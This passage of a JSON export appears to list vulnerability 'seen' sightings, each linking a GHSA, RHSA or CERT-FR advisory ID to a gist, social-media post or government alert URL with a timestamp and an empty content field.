"2026-03-13T09:10:05.000000Z"}, {"uuid": "b7dbf79a-1e86-486f-979e-185c730c12d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4hgg-c4rr-6h7f", "type": "seen", "source": "https://gist.github.com/alon710/97d8836abc82cac88ce934ff047f0ac3", "content": "", "creation_timestamp": "2026-03-09T17:40:05.000000Z"}, {"uuid": "cbdf2ab3-19ed-41ae-b22a-99dcdfd6f3cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0383", "type": "seen", "source": "https://gist.github.com/alon710/1ebd78b25a55363e86004a46cf589989", "content": "", "creation_timestamp": "2026-01-24T22:41:18.000000Z"}, {"uuid": "1c41a607-3199-41fe-9438-8a22d79af4d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9rp8-h4g8-8766", "type": "seen", "source": "https://gist.github.com/alon710/5967cca25813bba028049efe335c473a", "content": "", "creation_timestamp": "2026-01-24T22:41:15.000000Z"}, {"uuid": "52e60ea0-c257-424f-837a-c5fab9326ba2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q92j-grw3-h492", "type": "seen", "source": "https://gist.github.com/alon710/11c45cdfd0d1ad3b473795f1fcfcc7b0", "content": "", "creation_timestamp": "2026-01-24T22:41:13.000000Z"}, {"uuid": "9bb2f74a-32f3-4fb5-ba75-3c7f09c6cde2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f82v-jwr5-mffw", "type": "seen", "source": "https://gist.github.com/alon710/f6346201ec0b07a53cc81987f242c93c", "content": "", "creation_timestamp": "2026-01-24T22:41:12.000000Z"}, {"uuid": "c869c311-2fc5-435f-a105-eacf521464d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qqhf-pm3j-96g7", "type": "seen", "source": "https://gist.github.com/alon710/410b496f06e7c9b6050eee0227975327", "content": "", "creation_timestamp": "2026-01-24T22:41:09.000000Z"}, {"uuid": "22f4afc0-2963-4dc7-af6d-e037001466ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hrhx-6h34-j5hc", "type": "seen", "source": "https://gist.github.com/alon710/7c3fde71c655f15e964d83a59a44bf40", "content": "", "creation_timestamp": "2026-01-24T22:41:08.000000Z"}, {"uuid": "15535228-056f-45e7-8718-b34811392c93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cg3c-245w-728m", "type": "seen", "source": "https://gist.github.com/alon710/6d07eaa50a9c65dee03f6d48a556821e", "content": "", "creation_timestamp": "2026-01-24T22:41:05.000000Z"}, {"uuid": "c6dd1f79-42cd-4417-a5b8-b6eaec87fec8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-whqx-f9j3-ch6m", "type": "seen", "source": "https://gist.github.com/alon710/5ac3689b8a5fa01f88bcf801ac1b0886", "content": "", "creation_timestamp": "2026-01-24T22:41:03.000000Z"}, {"uuid": "cebc2e1c-2fa8-4a16-9536-c14b2afdbc6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq4m-mc3c-vvg3", "type": "seen", "source": "https://gist.github.com/alon710/e5af0078421c49d24cd7cb399e533988", "content": "", "creation_timestamp": "2026-01-24T22:41:02.000000Z"}, {"uuid": "aabc77ec-1baf-4cad-b5b0-d53d85ca4f8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-524m-q5m7-79mm", "type": "seen", "source": "https://gist.github.com/alon710/f427c409d62771501c54c31e089d90b0", "content": "", "creation_timestamp": "2026-01-24T22:41:01.000000Z"}, {"uuid": "cf1185a4-20a6-42d1-827a-ac8f3cf1dbce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hcp2-x6j4-29j7", "type": "seen", "source": "https://gist.github.com/alon710/78b361a560ea3ac3c636b848b70465ab", "content": "", "creation_timestamp": "2026-01-24T22:41:00.000000Z"}, {"uuid": "4fb24a2a-e1d2-4328-9587-574511b99c15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mq3p-rrmp-79jg", "type": "seen", "source": "https://gist.github.com/alon710/b95cfd1bc96543ae7a24e9c68ae4abe8", "content": "", "creation_timestamp": "2026-01-24T22:40:58.000000Z"}, {"uuid": "dba0f494-7bb2-45e7-90ca-44b91c78488c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mr7q-c9w9-wh4h", "type": "seen", "source": "https://gist.github.com/alon710/a4a5adefe9b2c1217bc6624b57b3d832", "content": "", "creation_timestamp": "2026-01-24T22:40:57.000000Z"}, {"uuid": "a83aa3f8-f90a-47c8-a0e9-f386293f3341", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xg9w-vg3g-6m68", "type": "seen", "source": "https://gist.github.com/alon710/fcf19efd25ef3360874d7d9a0c1947ed", "content": "", "creation_timestamp": "2026-01-24T22:40:55.000000Z"}, {"uuid": "4a717814-d239-427f-95d6-dbb78d81d4af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f67f-6cw9-8mq4", "type": "seen", "source": "https://gist.github.com/alon710/522da85091e0011097c4d52154cd1e54", "content": "", "creation_timestamp": "2026-01-24T22:40:54.000000Z"}, {"uuid": "b3e647c4-4b76-451b-8e64-64e5f194ae05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2026-ACT-004", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mddiej3zy226", "content": "", "creation_timestamp": "2026-01-26T14:47:11.434022Z"}, {"uuid": "8e39bf41-9a68-470a-9327-ed2845b872da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2026-ACT-004", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115961943162528773", "content": "", "creation_timestamp": "2026-01-26T14:47:12.295876Z"}, {"uuid": "0b912603-f1c6-4789-9a30-898e99450736", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2026-ACT-004", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mddmksf27v2t", "content": "", "creation_timestamp": "2026-01-26T16:02:17.398670Z"}, {"uuid": "5055f1a6-088c-48ed-83e3-4a4bd14e6644", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wxhw-j4hc-fmq6", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3mdgwro56ha2c", "content": "", "creation_timestamp": "2026-01-27T23:43:08.085341Z"}, {"uuid": "793d0928-0ed2-4b11-b7e9-09fba0c8af61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2x38-48vp-w23x", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115969785847265606", "content": "", "creation_timestamp": "2026-01-28T00:01:40.936975Z"}, {"uuid": "4997ec5c-b3fb-4a42-8991-c7ece6bf62a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-99p7-6v5w-7xg8", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3mdhdclah5m2d", "content": "", "creation_timestamp": "2026-01-28T03:27:17.323794Z"}, {"uuid": "7e830d23-3762-45b0-a95b-32fe9172e36e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7xvx-8pf2-pv5g", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3mdhdcleuyh2d", "content": "", "creation_timestamp": "2026-01-28T03:27:20.975545Z"}, {"uuid": "f78413b7-1fbe-433f-bf73-0e1aae0e1a05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jfpc-wj3m-qw2m", "type": "seen", "source": "https://gist.github.com/alon710/6005675fc930251c9d8000c9e9ab7e40", "content": "", "creation_timestamp": "2026-01-31T01:20:51.000000Z"}, {"uuid": "2e1dfb80-ca73-4ae0-8cce-64f788c82042", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FH4V-V779-4G2W", "type": "seen", "source": "https://t.me/securixy_kz/1104", "content": "", "creation_timestamp": "2026-07-12T22:00:09.211991Z"}, {"uuid": "b7f60d0c-6bb9-4d55-913d-85be1a67dadd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-336w-hgpq-6369", "type": "seen", "source": "https://gist.github.com/alon710/d39f573efb957757ba7be655034c3074", "content": "", "creation_timestamp": "2026-02-02T12:10:51.000000Z"}, {"uuid": "97894cf8-9385-41df-a94a-c8fb15e2b890", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2026-ACT-005", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mdv2f55uwk26", "content": "", "creation_timestamp": "2026-02-02T14:24:55.382624Z"}, {"uuid": "f037eca6-823b-4720-9f55-1096e5610d41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2026-ACT-005", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mdv6qqjhxb2m", "content": "", "creation_timestamp": "2026-02-02T15:42:59.547128Z"}, {"uuid": "911cfef9-8c47-48b0-8df9-bcdf7ca2fea0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6cqr-8cfr-67f8", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/n8n-security-advisory-av26-091", "content": "", "creation_timestamp": "2026-02-05T15:56:30.000000Z"}, {"uuid": "f74bca43-22b5-4706-98c8-53332f427e77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hv53-3329-vmrm", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/n8n-security-advisory-av26-091", "content": "", "creation_timestamp": "2026-02-05T15:56:30.000000Z"}, {"uuid": "43abfa1a-3cf3-49ee-87ed-36dd3c302a79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9g95-qf3f-ggrw", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/n8n-security-advisory-av26-091", "content": "", "creation_timestamp": "2026-02-05T15:56:30.000000Z"}, {"uuid": "5c287271-6bb9-4c47-87ce-ce37b825b501", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m82q-59gv-mcr9", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/n8n-security-advisory-av26-091", "content": "", "creation_timestamp": "2026-02-05T15:56:30.000000Z"}, {"uuid": "b3abb744-69af-4679-acbc-cc2396f1fda1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qpq4-pw7f-pp8w", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/n8n-security-advisory-av26-091", "content": "", "creation_timestamp": "2026-02-05T15:56:30.000000Z"}, {"uuid": "5afd5ee4-ffa0-480a-a096-1404aa48e563", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vhw5-3g5m-8ggf", "type": "seen", "source": "https://gist.github.com/alon710/73f94a67bf4511676e0f9301624d10f2", "content": "", "creation_timestamp": "2026-02-04T17:40:06.000000Z"}, {"uuid": "fc48990e-85bc-4ff5-9f63-1955d611387d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7c4h-vh2m-743m", "type": "seen", "source": "https://gist.github.com/alon710/ddae9ab548d2b495189eb4cf224eaa37", "content": "", "creation_timestamp": "2026-02-04T18:10:06.000000Z"}, {"uuid": "917bbe4c-a337-40aa-a998-d51a718cf140", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m6jq-g7gq-5w3c", "type": "seen", "source": "https://gist.github.com/alon710/12dc0c72bbb2429006708d5ae406b945", "content": "", "creation_timestamp": "2026-02-04T18:40:05.000000Z"}, {"uuid": "3707a456-d0fb-4e9a-b074-bad0c2632dcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8398-gmmx-564h", "type": "seen", "source": "https://gist.github.com/alon710/7d9a8b07c2ceec48a9fcaf0715b3bbd6", "content": "", "creation_timestamp": "2026-02-04T20:10:05.000000Z"}, {"uuid": "db6e6869-4e41-4242-ae6f-5dd1be96fc19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vrhw-v2hw-jffx", "type": "seen", "source": "https://gist.github.com/alon710/065ebcce877f52bfe48413cb26322f59", "content": "", "creation_timestamp": "2026-02-03T16:40:06.000000Z"}, {"uuid": "2caec0d7-6a90-4904-bed4-e5432d6d7074", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2286-hxv5-cmp2", "type": "seen", "source": "https://gist.github.com/alon710/bd4453d29ecd0c32312268e6666d88de", "content": "", "creation_timestamp": "2026-02-05T22:40:06.000000Z"}, {"uuid": "a22605df-5004-41ab-b3c1-b40d6ffa9337", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RR6P-3PFG-562J", "type": "seen", "source": "https://t.me/securixy_kz/1121", "content": "", "creation_timestamp": "2026-07-12T22:00:07.652680Z"}, {"uuid": "b767beae-58fb-4d1b-8628-6567526de3ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8X3W-QJ7J-GQHF", "type": "seen", "source": "https://gist.github.com/alon710/e6ba19fa05c50035f1ea8b25301fc34c", "content": "", "creation_timestamp": "2026-02-04T20:40:05.000000Z"}, {"uuid": "4820482c-204d-48d5-bdb5-c4748663ac5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fc6g-2gcp-2qrq", "type": "seen", "source": "https://gist.github.com/alon710/4c9483a1ae63cde824ec94a73e4b4ee0", "content": "", "creation_timestamp": "2026-02-03T17:40:05.000000Z"}, {"uuid": "cf4131af-1647-426b-8bce-59627ae06a2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r54g-49rx-98cr", "type": "seen", "source": "https://gist.github.com/alon710/b1f5845bad08cb88f5b1ff4accf32464", "content": "", "creation_timestamp": "2026-02-03T18:10:05.000000Z"}, {"uuid": "55f38ba7-d597-49c9-b20d-87719c119499", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5847-RM3G-23MW", "type": "seen", "source": "https://gist.github.com/alon710/5140ab55ac1ef23f4d5f0c56b10ebb98", "content": "", "creation_timestamp": "2026-03-03T03:10:08.000000Z"}, {"uuid": "cde9cba7-5011-4750-9316-c6a05cf90567", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WCCX-J62J-R448", "type": "seen", "source": "https://gist.github.com/alon710/e6d82ddf56f9cc423fe0bd2c29fc1156", "content": "", "creation_timestamp": "2026-03-04T22:40:05.000000Z"}, {"uuid": "cc7cff5d-d426-4eef-9f0e-b63428191688", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QVR7-G57C-MRC7", "type": "seen", "source": "https://gist.github.com/alon710/9043ce78d06e180ba0c37f433163b2aa", "content": "", "creation_timestamp": "2026-03-13T17:10:06.000000Z"}, {"uuid": "e3e6b5fb-65ec-4c44-b760-18698cf0544b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F7WW-2725-QVW2", "type": "seen", "source": "https://gist.github.com/alon710/bffd66867d7e1347878d807d5c4dde51", "content": "", "creation_timestamp": "2026-03-03T03:40:09.000000Z"}, {"uuid": "0872ff02-a6cb-4c4c-b181-b10646a82711", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fqcm-97m6-w7rm", "type": "seen", "source": "https://gist.github.com/alon710/835a94fe78aca52e1d27bef34cfc24c6", "content": "", "creation_timestamp": "2026-03-03T04:10:19.000000Z"}, {"uuid": "eda042f1-e201-49f2-844e-cb0453f441a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-HWPQ-RRPF-PGCQ", "type": "seen", "source": "https://gist.github.com/alon710/6d1585c6fadbfa0eb477c8b403bc53c9", "content": "", "creation_timestamp": "2026-03-03T04:40:09.000000Z"}, {"uuid": "fe3e8b32-a7ce-4033-a52c-5984e0b58399", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-hwpq-rrpf-pgcq", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3mg4y3rg5jw25", "content": "", "creation_timestamp": "2026-03-03T04:55:35.180281Z"}, {"uuid": "224798c1-68f1-44f7-b28c-596402215485", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wf45-3gpw-vrqv", "type": "seen", "source": "https://gist.github.com/alon710/ae14f3ab86f97e851dfebe5b270a8a84", "content": "", "creation_timestamp": "2026-03-05T00:10:05.000000Z"}, {"uuid": "a0204bfd-b6c7-4c6c-aa28-2d8aa4f561fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-943Q-MWMV-HHVH", "type": "seen", "source": "https://gist.github.com/alon710/0ce0831138542e2699b6da855c19dde1", "content": "", "creation_timestamp": "2026-03-03T05:10:09.000000Z"}, {"uuid": "4b121af7-4665-4370-b5f5-27cccffacbf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5528-5vmv-3xc2", "type": "seen", "source": "https://gist.github.com/alon710/303814197fd47e8be1513f6dbe263ced", "content": "", "creation_timestamp": "2026-03-05T00:40:06.000000Z"}, {"uuid": "59c6fb1e-a55c-454d-b569-ca0670b93dde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m7jm-9gc2-mpf2", "type": "seen", "source": "https://gist.github.com/konard/48328482182d1a8243fb86e2c4f440ce", "content": "", "creation_timestamp": "2026-03-05T15:12:50.000000Z"}, {"uuid": "9185e642-02e6-472a-ab6c-d1da67c5fc15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5rq4-664w-9x2c", "type": "seen", "source": "https://gist.github.com/konard/48328482182d1a8243fb86e2c4f440ce", "content": "", "creation_timestamp": "2026-03-05T15:12:50.000000Z"}, {"uuid": "9ead6348-1e76-4e6a-ae1c-85a6376e3d60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gw94-hprh-4wj8", "type": "seen", "source": "https://gist.github.com/alon710/91e9fb643e21046b7910878c4d30d36a", "content": "", "creation_timestamp": "2026-03-12T08:10:05.000000Z"}, {"uuid": "76545635-fdac-41fd-9fad-43a34c5b881d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9VVH-2768-C8VP", "type": "seen", "source": "https://gist.github.com/alon710/65f9eec51feb9b3484c1877d70ac1c35", "content": "", "creation_timestamp": "2026-03-13T19:40:05.000000Z"}, {"uuid": "2e96c73c-09cd-490d-b310-f156e6c7c4ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-V892-HWPG-JWQP", "type": "seen", "source": "https://gist.github.com/alon710/315443b2c64c5337a0ec35deba7b69bb", "content": "", "creation_timestamp": "2026-03-03T06:10:08.000000Z"}, {"uuid": "bf636bdb-30b7-456e-a6b3-127e16e51922", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5CXW-W2XG-2M8H", "type": "seen", "source": "https://gist.github.com/alon710/25afc6b7c80d9d4a2082df7705bf284f", "content": "", "creation_timestamp": "2026-03-13T21:10:06.000000Z"}, {"uuid": "e0081111-fb2d-49c4-bda5-460379bae200", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5hwf-rc88-82xm", "type": "seen", "source": "https://gist.github.com/alon710/25afc6b7c80d9d4a2082df7705bf284f", "content": "", "creation_timestamp": "2026-03-13T21:10:06.000000Z"}, {"uuid": "d3c9e62a-8f40-4a86-bc9a-fcd65a15c949", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JMM5-FVH5-GF4P", "type": "seen", "source": "https://gist.github.com/alon710/a29701acb65476eb81b4f986433552ab", "content": "", "creation_timestamp": "2026-03-03T06:40:08.000000Z"}, {"uuid": "150c90f1-fe9b-4306-8ff2-84583415e6ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v2x6-wwfw-r2rq", "type": "seen", "source": "https://gist.github.com/alon710/cf811d4e005dc0fb2b2c95d485ea1319", "content": "", "creation_timestamp": "2026-03-05T02:10:06.000000Z"}, {"uuid": "3d2ebf40-d550-4273-8f42-4a64f18264f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-G3HP-VVQF-8VW6", "type": "seen", "source": "https://gist.github.com/alon710/49f2db569bc474aab9f493dc84839f32", "content": "", "creation_timestamp": "2026-03-12T09:40:06.000000Z"}, {"uuid": "c198f1af-c3cc-4fc8-b45f-3df0946d1fba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W75W-9QV4-J5XJ", "type": "seen", "source": "https://gist.github.com/alon710/519ea7e572bbad6d5d78d829de0db2ff", "content": "", "creation_timestamp": "2026-03-05T02:40:06.000000Z"}, {"uuid": "5bcc99fe-6847-416c-bf38-f565426e9b78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-w75w-9qv4-j5xj", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3mgbsc47g6w24", "content": "", "creation_timestamp": "2026-03-05T02:55:03.594376Z"}, {"uuid": "df0d5bbe-bee6-4e09-af38-84b611d74deb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W75W-9QV4-J5XJ", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mgbtam26tmu2", "content": "", "creation_timestamp": "2026-03-05T03:12:08.658683Z"}, {"uuid": "93185437-30a5-4140-b51d-680063493ccf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rvpw-p7vw-wj3m", "type": "seen", "source": "https://gist.github.com/alon710/a6851bbd56dcc5d9e2542a826139f558", "content": "", "creation_timestamp": "2026-03-05T03:10:05.000000Z"}, {"uuid": "c83bfda5-6d04-450b-bbe7-8693aabfaf3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7x23-j8gv-v54x", "type": "seen", "source": "https://gist.github.com/alon710/b9663d5e263c3281f512bc473b89c55f", "content": "", "creation_timestamp": "2026-03-13T21:40:05.000000Z"}, {"uuid": "9728e120-e63e-42eb-a221-3311b56a74f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QFFP-2RHF-9H96", "type": "seen", "source": "https://gist.github.com/alon710/4e188c1f17fb9b45a77309c7ed7f2580", "content": "", "creation_timestamp": "2026-03-05T03:40:06.000000Z"}, {"uuid": "48067736-638f-43f8-b74a-d3f6847dc404", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-47Q7-97XP-M272", "type": "seen", "source": "https://gist.github.com/alon710/8343a2b9eb670aebfd22651a69c65995", "content": "", "creation_timestamp": "2026-03-03T08:40:09.000000Z"}, {"uuid": "1c6a8601-ddc1-40b1-a6ea-d679fa991885", "vulnerability_lookup_origin": 